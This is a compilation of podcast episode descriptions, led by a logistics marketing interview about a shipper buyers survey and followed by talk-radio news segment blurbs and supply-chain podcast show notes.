Jim Bierfeldt and Joe Lynch dicuss logistics buyers survey. Jim is the Founder and President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. About Jim Bierfeldt Jim Bierfeldt is the Founder and President of Logistics Marketing Advisors. Jim has had a 35-year career in marketing and communications, including 25+ within the logistics industry. He ran marketing for a large 3PL before launching his own marketing agency, Logistics Marketing Advisors, which focuses exclusively on providing marketing strategy and services to logistics businesses.  His expertise includes strategic planning, brand positioning, advertising, public relations, website strategy and design, and development of white papers, case studies and other content. Jim has worked with both smaller, regional logistics companies and multi-billion dollar global firms, all of whom benefit from his unique combination of marketing expertise and logistics industry knowledge. Jim holds a Masters Degree in Communications from Fordham University and has been an active in CSCMP, WERC and the IWLA. His hobbies include running (including multiple marathons). About Logistics Marketing Advisors Logistics Marketing Advisors (LMA) is a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. Our niche focus gives us the industry understanding and contacts required to market effectively to logistics decision makers. We're a HubSpot-certified, inbound marketing agency with the following specialties: branding and positioning strategy, lead generation, web design and development, content marketing, public relations, and creation of branded and educational content like videos, case studies, white papers and other sales support materials. LMA's approach recognizes that logistics services today are BOUGHT, not sold. Marketing tactics that interrupt and annoy busy logistics executives get ignored. These buyers now have access to a wealth of information and do their own research on how to solve supply chain problems, and what providers can do to help. At LMA, we help logistics businesses get found by prospects during this research phase. Instead of building a marketing engine to solicit, we build an engine that naturally attracts the best prospects. The best way to do that is with helpful, provocative content that leads prospects to conclude, for themselves, that your company has the best solution for their specific challenge. Key Takeaways: Logistics Buyers Survey Jim Bierfeldt is the President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. In the podcast interview, Jim shared some of the findings from the logistics buyers survey that his firm publishes every other year since 2014. Jim and his team have done the research to really understand what shippers want from their 3PL. The survey results are available for free within the “Marketing Logistics Services” download on The LMA website. Below are a few of the survey questions that LMA asked people who buy 3PL services: When it comes to choosing a logistics product or service provider, which statement best describes your attitude and priority? Which sources of information do you rely on to stay current on logistics management strategies, service providers, and logistics industry news? Think about the last time you proactively reached out to a logistics business (that was not a current supplier) to learn more or to discuss a project. What led you to reach out? How do you prefer to be contacted by a logistics business? The survey results along with expert insights are contained in an easy to read 19 page PDF report available on LMA's home page. The report is completely free, no obligation, they don't even ask for your contact information. Logistics Marketing Advisors designs and executes strategic marketing programs that help logistics businesses drive revenue and profit. LMA is a specialty agency focused the logistics industry - this enable them to maintain the industry knowledge and contacts required to help their clients succeed. Learn More About Logistics Buyers Survey Jim's LinkedIn Logistics Marketing Advisors (LMA) LinkedIn Logistics Marketing Advisors (LMA) 2022 Logistics Buyer Research Report The Logistics of Logistics Podcast If you enjoy the podcast, please leave a positive review, subscribe, and share it with your friends and colleagues. The Logistics of Logistics Podcast: Google, Apple, Castbox, Spotify, Stitcher, PlayerFM, Tunein, Podbean, Owltail, Libsyn, Overcast Check out The Logistics of Logistics on Youtube  

WERC reporter Gwynne Mountz joins JT for an update on the World games

White House Correspondent Jon Decker discusses the chances that President Biden will run for re-election in 2024.

IHeart Radio National Correspondent Rory Oneill discusses the upcoming hearings from the January 6th Committee as well as whether the gas prices will continue declining.

Heritage Expert Virginia Allen talks about what local Texas leaders are saying as the border crisis keeps getting worse.

Jared Hudson, candidate for Jefferson County Sheriff discusses why he is the right fit for the Jefferson County Sheriff's Department.

Former US Attorney Jay Town discusses how new gun laws give more resources to gun stores and pawn shops as well as the "good time law" which put the man who shot Deputy Brad Johnson back on the street.

Cindy Collins, spokesperson for Operation Outcry, how American women will be better off now that the Supreme COurt has reversed Roe v. Wade.

Fox News Rado's Eben Brown has the latest on WNBA star Brittany Griner who is still being detained in Russia.

Founder and CEO of InVest USA, Michael Letts, talks about a Detroit Ice Cream Shop who refuses to serve uniformed police officers.

IHeart Radio National Correspondent Rory Oneill has the latest on the death of the former Japanese prime minister as well as WNBA star Brittany Griner entering a guilty plea in a Russian court.

Editor in CHief of the New York Anaysis of Policy and Government, Frank Vernuccio has the latest on the resignation of Boris Johnson

Investment Advisor Ed D'Agostino talks about where you should be putting your money with a recession looming.

IHeart Radio National Correspondent Sara Lee Kessler has the latest on the July 4th shooting in Highland Park, IL

University of Texas at Arlington Political Science Professor Allan Saxe discusses Trump allies being subpoenaed by Fulton county DA in election probe.

Jonathan Strickland, host of the Tech Stuff podcast discusses a case where artificial intelligence didn't really work as intended.

Attorney Kirby Farris discusses the case of a former UAB football convicted of murder getting a new trial.

Lt. Steve Rogers discusses how Democrat leaders look the other way as crime skyrockets in major cities.

IHeart Radio National Correspondent Rory Oneill discusses Boris Johnson resigning amid many of his cabinet members leaving as well as discussing the looming recession and whether layoffs will follow.

IHeart Radio National Correspondent Rory Oneill discusses a new study that shows Americans are losing confidence in Congress and the Supreme Court while still supporting the military, police and small business.

President of the Take Back Action Fund, John Pudner, discusses how the political damage suffered by Don ald Trump during the January 6th hearings could open the door for some new Republican Presidential hopefuls.

Jonathan Skinner from WBRC Fox 6 gives us the latest on the capture of the kidnapping suspect from Calhoun County.

Congressman Mo Brooks talks about receiving a subpoena from the January 6th committee and the conditions that he has before he will testify.

IHeart Radio National Correspondent Erin Real has the latest on the parade shooting in Highland Park, IL.

The Supply Chain Buzz is on for April 25, and this week, Scott and Greg are joined by 6 River Systems Vice President of Product & Analytics Gillan Hawkes to discuss automation's hopeful future for businesses big and small. Tune in to hear them talk positive disruption, how to plan for uncertainty, why risk must trump cost and more. Additional Links & Resources: Learn more about Supply Chain Now:https://supplychainnow.com/program/supply-chain-now ( https://supplychainnow.com/program/supply-chain-now) Subscribe to Supply Chain Now and all other Supply Chain Now programs:https://supplychainnow.com/subscribe ( https://supplychainnow.com/subscribe) Learn more about 6RS upcoming WERC event: https://bit.ly/3EOG50d (https://bit.ly/3EOG50d) Leveraging Logistics and Supply Chain for Ukraine: https://vectorgl.com/stand-with-ukraine/ (https://vectorgl.com/stand-with-ukraine/) WEBINAR- How to Solve Three Common Peak Season Challenges: https://bit.ly/3r3Qxel (https://bit.ly/3r3Qxel) WEBINAR- The 10 Best Competencies of Best in Class Warehouses: https://bit.ly/3vh3MLd (https://bit.ly/3vh3MLd) 2022 Q1 U.S. Bank Freight Payment Index:https://bit.ly/3pwmWKC ( https://bit.ly/3pwmWKC) Check out the 2022 Supply Chain and Procurement Awards: https://supplychainprocurementawards.com/ (https://supplychainprocurementawards.com/) This episode is hosted by Scott Luton and Greg White. For additional information, please visit our dedicated show page at: https://supplychainnow.com/supply-chain-buzz-6-river-systems-886

This month we are joined by Dr. Bob Novack, CSCR Director of Student Research and Outreach and Associate Professor of Supply Chain Management at the Penn State Smeal College of Business. During this episode, supply chain professionals will receive insights and tips about talent management from the perspective of a seasoned college professor interacting with top-tier talent daily. Dr. Novack and our hosts discuss what he's discovered regarding ways companies can stand out in a crowd, challenges in recruitment, and strategies for how to best connect with students.----more---- Dr. Novack is currently the CSCR Director of Student Research and Student Outreach and Associate Professor of Supply Chain Management at the Penn State Smeal College of Business. From 1979 to 1981, Novack worked in Operations and planning for the Yellow Freight Corporation in Overland park, KS. From 1981 to 1984, Novack worked for the Drackett Company in Cincinnati, OH. He is the co-author of two textbooks: Transportation (with John Coyle and Ed Bardi), and Creating Logistics Value: Themes for the Future (with Lloyd Rinehart and John Langley). He has published numerous articles in the Journal of Business Logistics and the Transportation Journal, among others. Novack is a member of AST&L, CLM, and WERC.

Today we're talking to Doctor Jeffrey Raber of The Werc Shop, a lab working to develop formulations for better more consistent cannabis products. He's also an instructor with the Ganjier Program, and Executive Director of the Association of Commercial Cannabis Labs (ACCL).   Patreon: https://www.patreon.com/bluegrasspodcast  Instagram: https://www.instagram.combluegrass_podcast/    twitter: https://twitter.com/bluegrasscast 

In this episode of the Supply Chain Buzz, Scott and Greg welcomed Rhonda Bompensa-Zimmerman and Demo Perez to the podcast to discuss the top news in Supply Chain this week. Rhonda Bompensa Zimmerman is an educator that is passionate about sharing behavioral strategies to help others find their way to living a more joyful and meaningful life. With decades serving as a Director of Fitness and Wellness at the collegiate level, she is excited to find her home now working in the transportation technology world at GlobalTranz. She is enjoying the opportunity to help her team, and other professionals in the industry, by sharing mind, body, and spirit positive health practices to aid them in their journey of personal and professional success. Demo Perez started his career in 1997 in the industry by chance when a relative asked him for help for two just weeks putting together an operation for FedEx Express at the Colon Free Zone, an area where he was never been but accepted the challenge. Worked in all roles possible from a truck driver to currier to a sales representative, helped the brand introduction, market share growth and recognition in the Colon Free Zone, at the end of 1999 had the chance to meet and have a chat with Fred Smith ( FedEx CEO), joined another company in 2018 who took over the FedEx operations as Operations and sales manager, in 2004 accepted the challenge from his company to leave the FedEx operations and business to take over the operation and business of DHL Express, his major competitor and rival so couldn't say no, by changing completely its operation model in the Free Zone. In 2005 started his first entrepreneurial journey by quitting his job and joining two friends to start a Freight Forwarding company. After 8 months was recruited back by his company LSP with the General Manager role with the challenge of growing the company and make it fully capable warehousing 3PL. By 2009 joined CSCMP and WERC and started his journey of learning and growing his international network and high-level learning. In 2012 for the first time joined a local association ( the Panama Maritime Chamber) and worked in the country's first Logistics Strategy plan, joined and lead other associations ending as president of the Panama Logistics Council in 2017. By finishing his professional mission at LSP with a company that was 8 times the size it was when accepted the role as GM with so many jobs generated and several young professionals coached, having great financial results, took the decision to move forward and start his own business from scratch by the end of 2019. with a friend and colleague co-founded IPL Group a company that started as a boutique 3PL and now is gearing up for the post-Covid era by moving to the big leagues. Upcoming Events & Resources Mentioned in this Episode: Subscribe to Supply Chain Now and ALL Supply Chain Now Programming Here: https://supplychainnowradio.com/subscribe Leave a review for Supply Chain Now: https://ratethispodcast.com/supplychainnow Connect with Scott on LinkedIn: www.linkedin.com/in/scottwindonluton/ Connect with Greg on LinkedIn: www.linkedin.com/in/gswhite/ Connect with Demo on LinkedIn: https://www.linkedin.com/in/demostenes-perez-ba06212/ Connect with Rhonda on LinkedIn: https://www.linkedin.com/in/rhonda-bompensa-zimmerman-phd-138aa3b/ Supply Chain Now Ranked #3 Supply Chain YouTube Channel: https://tinyurl.com/yazfegov Download the Q3 2020 U.S. Bank Freight Payment Index: freight.usbank.com/?es=a229&a=20 Watch the Replay of The Connected IoT Supply Chain: https://supplychainnow.com/the-connected-iot-supply-chain Check Out News From Our Sponsors: U.S. Bank: www.usbpayment.com/transportation-solutions Capgemini: www.capgemini.com/us-en/ Vector Global Logistics: vectorgl.com/ Verusen: www.verusen.com/ This episode was hosted by Scott Luton and Greg White. For additional information, please visit our dedicated show page at:...